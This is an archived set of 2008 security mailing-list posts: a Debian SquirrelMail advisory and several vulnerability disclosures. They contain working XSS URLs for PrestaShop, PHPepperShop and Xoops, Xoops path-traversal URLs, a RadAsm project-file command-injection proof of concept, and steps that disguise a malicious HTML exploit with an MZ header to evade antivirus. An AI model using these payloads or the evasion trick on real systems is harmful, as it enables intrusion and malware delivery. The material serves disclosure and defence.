X-Spam-Status: No, score=-8.58 tagged_above=3.6 required=5.3
tests=[FOURLA=0.1, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2,
PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1682-1] New squirrelmail packages fix cross site scripting
Priority: urgent
Resent-Message-ID: <OFtfSt__IxE.A.4PC.mh_OJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sun,  7 Dec 2008 16:23:02 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-168201                  security@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
December 07, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : squirrelmail
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-2379

Ivan Markovic discovered that SquirrelMail, a webmail application, did not
sufficiently sanitise incoming HTML email, allowing an attacker to perform
cross site scripting through sending a malicious HTML email.

For the stable distribution (etch), this problem has been fixed in
version 1.4.9a-3.

For the unstable distribution (sid), this problem has been fixed in
version 1.4.15-4.

We recommend that you upgrade your squirrelmail package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.9a-3.diff.gz
    Size/MD5 checksum:    23420 b1755b11f721f2bdc7c5a100cf83f1d6
  http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.9a.orig.tar.gz
    Size/MD5 checksum:   598950 5b19f8cc5badef91d1f2410df41564bc
  http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.9a-3.dsc
    Size/MD5 checksum:     1021 9954f8522b7059cb115f5a77405c298f

Architecture independent packages:

  http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.9a-3_all.deb
    Size/MD5 checksum:   591892 35c2060553f375b9bd8759d06b401153


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSTv2wGz0hbPcukPfAQIIwgf+OFYz0lUhZHOXrbTGhw3Nd+eQujaYB+oR
fgtKT9WpHNP/lYdBtuSj6LouGH5sLMlCSaUGwzMGfuCOKqB1ghFKOaeB5Yu1Oe0i
0ZZiofVeUmGbU+lee8l4Z11Okwg1Ck4/4raHrA06hpJnSno43o/JjVybXJr2pdGq
keYvtp5c2rhqr0kLqdpG9ZUPRnv69kstkHrWErPS8+/qRKewoSKN8N7KVeAd1Dva
Rx0ZHGc1ASJTPwMOaH/UiDFLxmS8weYnKkmWDk0mATN1qkXr6DZmHsQ2qMK7J+Eh
cWkSKTVNUtY2pk3Ka4I1ZmyyRoc1cZBmi6vs8Lo9EXK50m3VCgKojw==PwzV
-----END PGP SIGNATURE-----

From - Mon Dec  8 10:59:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f01
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38847-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id EBAA1ECDC0
for <lists@securityspace.com>; Mon,  8 Dec 2008 10:57:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3D155237005; Mon,  8 Dec 2008 08:33:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17482 invoked from network); 8 Dec 2008 03:29:17 -0000
Date: Sun, 7 Dec 2008 20:32:37 -0700
Message-Id: <200812080332.mB83Wa3g001589@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: th3.r00k.ieatpork@gmail.pork.com
To: bugtraq@securityfocus.com
Subject: Two XSS Flaws in PrestaShop 1.1.0.3
Status:   

Affects PrestaShop 1.1.0.3
product: homepage: http://prestashop.com

This is XSS in the URI of PrestaShop.  Trust no one,  not even your $_SERVER[PHP_SELF] .

http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealert(1)%3C/script%3E

Add an item to the shoping cart and then vist this url:
http://10.1.1.155/Audit/Commerce/prestashop_1.1.0.3/order.php/%22%3Cscript%3Ealert(1)%3C/script%3E

Peace

From - Mon Dec  8 11:09:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f02
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38848-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 80A21ECC98
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:08:09 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id E0B90237036; Mon,  8 Dec 2008 08:33:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17652 invoked from network); 8 Dec 2008 03:37:42 -0000
Date: 8 Dec 2008 03:48:39 -0000
Message-ID: <20081208034839.11798.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: th3.r00k.ieatpork@gmail.pork.com
To: bugtraq@securityfocus.com
Subject: XSS in PHPepperShop v 1.4
Status:   

Vulnerable Version:PHPepperShop v 1.4
Homepage:http://www.phpeppershop.com

This is 4 reflective XSS flaws in the URI. Trust no one not even your $_SERVER[PHP_SELF]

http://10.1.1.10/shop/kontakt.php/'<script>alert(1)</script>

http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E

http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E

http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"<script>alert(1)</script>

From - Mon Dec  8 11:19:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f03
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38849-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3448AECDC0
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:14:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7FA3523703B; Mon,  8 Dec 2008 08:35:50 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19970 invoked from network); 8 Dec 2008 05:43:48 -0000
Date: 8 Dec 2008 05:54:45 -0000
Message-ID: <20081208055445.20160.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: xhakerman2006@yahoo.com
To: bugtraq@securityfocus.com
Subject: RadAsm <=2.2.1.5 Local Command Execution
Status:   

------------------------------------------------------------------
vulnerability discovered by DATA_SNIPER.
bug discovred in 25/11/2008.
infected version:All Version
greetz go to:www.at4re.com(Arab Team 4 Reverse Engineering),arab4services.net
Critical: Highly critical
Impact:Command Execution
------------------------------------------------------------------
this is litel POC that can execute arabitrary command in victime machine.
in unexpected way the attacker can put in the project file ".rap file" command instead of the linker path or  Macro Assembler "ML.exe" path.
project file look like this.
" some data has been cuted for making it readable"
-------------------------------------
project file structure
[Project]
Assembler=masm
Type=Win32 App
......datat
[Files]
1=file.Asm
.....data
[MakeFiles]
5=CRC Check.exe
[MakeDef]
Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1 <==Command Execution by replacing the original file path with the command
2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",2  <==Command Execution by replacing the original file path with the command
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res <==Command Execution by replacing the original file path with the command
7=0,0,"$E\OllyDbg",5
6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm
11=4,O,$B\RC.EXE /v,1   <==Command Execution by replacing the original file path with the command
12=3,O,$B\ML.EXE /c /coff /Cp /Zi /nologo /I"$I",2   <==Command Execution by replacing the original file path with the command
13=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /DEBUG /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
data.....
[Resource]
data.....and more data.
----------------------------------------------------------------------
as you see " <==Command Execution breplacing the original file name with the command" this mean, that type of data in the project it's  exploited as command execution by malicious people.
and when the user try to compile the project will face the issue of executing bad command in his operating system.

From - Mon Dec  8 11:29:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f04
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38851-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id DCADDECDBC
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:27:06 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id DF500237060; Mon,  8 Dec 2008 08:37:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24049 invoked from network); 8 Dec 2008 10:32:05 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=simple; s=one; d=codelabs.ru;
h=Received:Date:From:To:Cc:Subject:Message-ID:References:MIME-Version:Content-Type:Content-Disposition:In-Reply-To:Sender;
b=VjRgsrYesThZ1rwoHlnsXXFoHrBT+/6H8BuaikoT0vi5pQCXHSJysFuImBbDxFcKlI1bOT6GcDP3taiifWRalPBo8WreC3SrANcVRUC0V1JRZEu3rXAF2UM6xNc4uTeXmqNbbB4PlK9clpickOkMp6fz0JvGbCI1w3XLrqe9ITk=;
Date: Mon, 8 Dec 2008 13:49:03 +0300
From: Eygene Ryabinkin <rea-sec@codelabs.ru>
To: cxib@securityreason.com
Cc: bugtraq@securityfocus.com
Subject: Re: SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
Message-ID: <sqp89FAGtFIVr1Bhz/kFH6+7Yu4@DnrfhFPe1KmBT9SMnrHVxzpiU9A>
References: <200812061940.mB6JemE5002856@www5.securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Disposition: inline
In-Reply-To: <200812061940.mB6JemE5002856@www5.securityfocus.com>
Sender: rea-sec@codelabs.ru
Status:   

Maksymilian, good day.

Sat, Dec 06, 2008 at 12:40:48PM -0700, cxib@securityreason.com wrote:
> [ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]
[...]
> Using PHP 5.2.6, as a Apache module can bypass many security points.

Am I right that this vulnerability exists only in the Apache 1.x flavour
of the PHP module?  The code in question that sets SG(server_context)
too late and initializes BG variable after the .htaccess processing
exists only in sapi/apache/mod_php5.c.  For Apache 2.x module the
handler is 'php_handler', it lives in apache2{filter,handler}/sapi_apache2.c
and BG/SG(server_context) are initialized before .htaccess processing.

And to clarify a bit the overall picture: am I right that the purpose of
your sleep.php manipulations is to make Apache to invoke another "fresh"
child that will process error_log contents with errorneous value of
uid/gid = 0?  It seems to me that the effect of the found vulnerability
can be shortly characterized as "the first request for the given Apache
child will have uid/gid = 0 as the values returned from 'php_getuid()'
in the code that handles .htaccess contents (to be precise, in the code
inside the function send_php() before the call to
apache_php_module_main(), the point where BG is really initialized by
PHP_RINIT_FUNCTION(basic))".  Am I missing something?

Thank you!
-- 
Eygene

From - Mon Dec  8 11:39:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f05
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38852-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BB8FAEC7D6
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:36:16 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 84733237065; Mon,  8 Dec 2008 08:38:03 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25378 invoked from network); 8 Dec 2008 12:02:27 -0000
Date: Mon, 8 Dec 2008 15:18:39 +0300
From: "Digital Security Research Group [DSecRG]" <research@dsec.ru>
X-Mailer: The Bat! (v3.80.06) Professional
Reply-To: "CTac C." <research@dsec.ru>
Organization: Digital Security
X-Priority: 3 (Normal)
Message-ID: <1396793223.20081208151839@dsec.ru>
To: bugtraq@securityfocus.com, vuln@secunia.com,
packet@packetstormsecurity.org
Subject: [DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   


Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-040


Application:                    XOOPS   
Versions Affected:              2.3.1
Vendor URL:                     http://www.xoops.org/
Bug:                            Multiple Local File Include
Exploits:                       YES
Reported:                       10.11.2008
Vendor response:                10.11.2008
Solution:                       YES
Date of Public Advisory:        08.12.2008
Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

XOOPS has Multiple Local File Include vulnerabilities.



Details
*******

Local File Include vulnerability found in scripts:

xoops_lib/modules/protector/blocks.php
xoops_lib/modules/protector/main.php

Successful exploitation requires that "register_globals" is enabled.

Code
----
#################################################

$mytrustdirname = basename( dirname( __FILE__ ) ) ;
$mytrustdirpath = dirname( __FILE__ ) ;

// language files
$language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ;
if( file_exists( "$mydirpath/language/$language/main.php" ) ) {
        // user customized language file (already read by common.php)
        // include_once "$mydirpath/language/$language/main.php" ;
} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) {
        // default language file
        include_once "$mytrustdirpath/language/$language/main.php" ;
...

#################################################

For successful exploitation first condition in if..else statement must be not true.

Example:

http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00
http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00



Solution
********

Vendor fixed this flaw on 26.11.2008. 

XOOPS 2.3.2a Security Release can be download from Sourceforge repository:

https://sourceforge.net/project/showfiles.php?group_idA586&package_id3583&release_idd3010

Release notes:

http://www.xoops.org/modules/news/article.php?storyidE40



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsec [dot] ru
            http://www.dsec.ru (in Russian)



From - Mon Dec  8 11:49:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f06
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38853-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3CD42EC803
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:49:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 9740D237077; Mon,  8 Dec 2008 08:38:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25474 invoked from network); 8 Dec 2008 12:05:31 -0000
Date: Mon, 8 Dec 2008 15:21:47 +0300
From: "Digital Security Research Group [DSecRG]" <research@dsec.ru>
X-Mailer: The Bat! (v3.80.06) Professional
Reply-To: "CTac C." <research@dsec.ru>
Organization: Digital Security
X-Priority: 3 (Normal)
Message-ID: <788445757.20081208152147@dsec.ru>
To: bugtraq@securityfocus.com, vuln@secunia.com,
packet@packetstormsecurity.org
Subject: [DSECRG-08-041] Stored XSS Vulnerability in Xoops 2.3.x
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   


Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-041


Application:                    XOOPS   
Versions Affected:              2.3.1, 2.3.2a
Vendor URL:                     http://www.xoops.org/
Bug:                            Stored XSS
Exploits:                       YES
Reported:                       10.11.2008
Vendor response:                10.11.2008
Solution:                       YES
Date of Public Advisory:        08.12.2008
Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

XOOPS has Stored XSS vulnerability.



Details
*******

Vulnerability found in script pmlite.php

User can inject script into private message using BBCode post parameter [url].

Example:

[url=" STYLE="test:expression(alert('DSecRG XSS'))]DSecRG XSS[/url]



Solution
********

Vendor fixed this flaw on 07.12.2008. 

XOOPS 2.3.2b Security Release can be download from Sourceforge repository:

https://sourceforge.net/project/showfiles.php?group_idA586&package_id3583&release_idd3845

Release notes:

http://www.xoops.org/modules/news/article.php?storyidE63



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsec [dot] ru
            http://www.dsec.ru (in Russian)



From - Mon Dec  8 11:59:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f07
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38854-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id D97E5ECBB1
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:58:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id A6D64237079; Mon,  8 Dec 2008 08:38:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26472 invoked from network); 8 Dec 2008 12:57:46 -0000
Message-ID: <493D1DBC.4060400@securityreason.com>
Date: Mon, 08 Dec 2008 14:14:36 +0100
From: Maksymilian Arciemowicz <cxib@securityreason.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: Eygene Ryabinkin <rea-sec@codelabs.ru>, bugtraq@securityfocus.com
Subject: Re: SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
References: <200812061940.mB6JemE5002856@www5.securityfocus.com> <sqp89FAGtFIVr1Bhz/kFH6+7Yu4@DnrfhFPe1KmBT9SMnrHVxzpiU9A>
In-Reply-To: <sqp89FAGtFIVr1Bhz/kFH6+7Yu4@DnrfhFPe1KmBT9SMnrHVxzpiU9A>
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 7bit
Status:   

Eygene Ryabinkin wrote:
> Maksymilian, good day.
> 
> Sat, Dec 06, 2008 at 12:40:48PM -0700, cxib@securityreason.com wrote:
>> [ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]
> [...]
>> Using PHP 5.2.6, as a Apache module can bypass many security points.
> 
> Am I right that this vulnerability exists only in the Apache 1.x flavour
> of the PHP module?  The code in question that sets SG(server_context)
> too late and initializes BG variable after the .htaccess processing
> exists only in sapi/apache/mod_php5.c.  For Apache 2.x module the
> handler is 'php_handler', it lives in apache2{filter,handler}/sapi_apache2.c
> and BG/SG(server_context) are initialized before .htaccess processing.

yes

BG(page_uid)=BG(page_gid)=0

should be -1

so

php_getuid() will return 0.

tested on apache 13 20 22

> 
> And to clarify a bit the overall picture: am I right that the purpose of
> your sleep.php manipulations is to make Apache to invoke another "fresh"
> child that will process

yes

> error_log contents with errorneous value of
> uid/gid = 0?  It seems to me that the effect of the found vulnerability
> can be shortly characterized as "the first request for the given Apache
> child will have uid/gid = 0 as the values returned from 'php_getuid()'
> in the code that handles .htaccess contents (to be precise, in the code
> inside the function send_php() before the call to
> apache_php_module_main(), the point where BG is really initialized by
> PHP_RINIT_FUNCTION(basic))".

if (BG(page_uid)==-1 || BG(page_gid)==-1)

will never happen in fresh apache child.

> Am I missing something?
> 

php_getuid() is a abstract function for php.

-- 
Best Regards,
------------------------
pub   1024D/A6986BD6 2008-08-22
uid                  Maksymilian Arciemowicz (cxib)
<cxib@securityreason.com>
sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

From - Mon Dec  8 12:09:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f08
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38850-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 29DFFECDBF
for <lists@securityspace.com>; Mon,  8 Dec 2008 12:03:21 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 388DE143A55; Mon,  8 Dec 2008 07:46:31 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20426 invoked from network); 8 Dec 2008 06:21:46 -0000
Date: Sun, 7 Dec 2008 23:26:16 -0700
Message-Id: <200812080626.mB86QGrN001758@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: xhakerman2006@yahoo.com
To: bugtraq@securityfocus.com
Subject: Multiple Vendor Anti-Virus Software Malicious WebPage Detection
 Bypass
Status:   

********************************************************************************************
Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass
         hackers.
NOTIFICATION:
this exploit are based on Andrey Bayora "magic of magic byte" but with some development.
This proof of concept was created for educational purposes only,Use the code it at your own risk.
The author will not be responsible for any damages.
*********************************************************************************************
Exploit Information:
    Date: 2008/19/08
    Impact: baypassing the Detection of  Malicious web page that can compromise a user's system
Vulnerabled AV-Software:
        ESET Smart Security latest version. <== The exploit was dedicated to it.
        AhnLab-V3 2008.9.13.0
        AntiVir 7.8.1.28
        AVG 8.0.0.161
        CAT-QuickHeal 9.50
        ClamAV 0.93.1
        DrWeb 4.44.0.09170
        eSafe 7.0.17.0
        eTrust 31.6.6086
        Ewido 4.0
        Fortinet 3.113.0.0
        Ikarus T3.1.1.34.0
        K7AntiVirus 7.10.454
        NOD32v2 3440
        Norman 5.80.02
        Panda 9.0.0.4
        PCTools 4.4.2.0
        Prevx1 V2
        Rising 20.61.42.00
        Sophos 4.33.0
        Sunbelt 3.1.1633.1
        Symantec 10
        TheHacker 6.3.0.9.081
        TrendMicro 8.700.0.1004
        VBA32 3.12.8.5
        ViRobot 2008.9.12.1375
        VirusBuster 4.5.11.0
the things that must be considered that the POC it's variant  from exploit to exploit(some times
Kaspersky and the other famous AV Sofware can be  deceive).
Proof Of Concept:
as i said the exploit are based on the magic of magic byte methode we will first add the MZ Header to the HTML Exploit and  change the exstention to txt or jpg or non extension,the exploit is compatible with IE6 and IE7 because IE6&7  execute the HTML Event if it's in txt file or non extension files.
so the exploit it's with corporate of IE6&7 :).
virustotal result of MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2).
http://www.virustotal.com/fr/analisis/062ec3b8d8b88e99865f798cc08b0718
and this is a Variant one "obfuscated by this methode".
http://www.virustotal.com/fr/analisis/7db1bd321a1f945b4abfa73844c36d99
POC:
1-add the MZ Header to the HTML file:
MZ&#1711;       &#1746;&#1746;  �       @                                   &#1591;   &#1563; �    &#1581;!�L&#1581;!This program cannot be run in DOS mode.
you can put other EXE info on the HTML Body for more deception "showing in the second result".
-rename the HTML to non extension file or txt or jpg.
3-upload it to webserver.
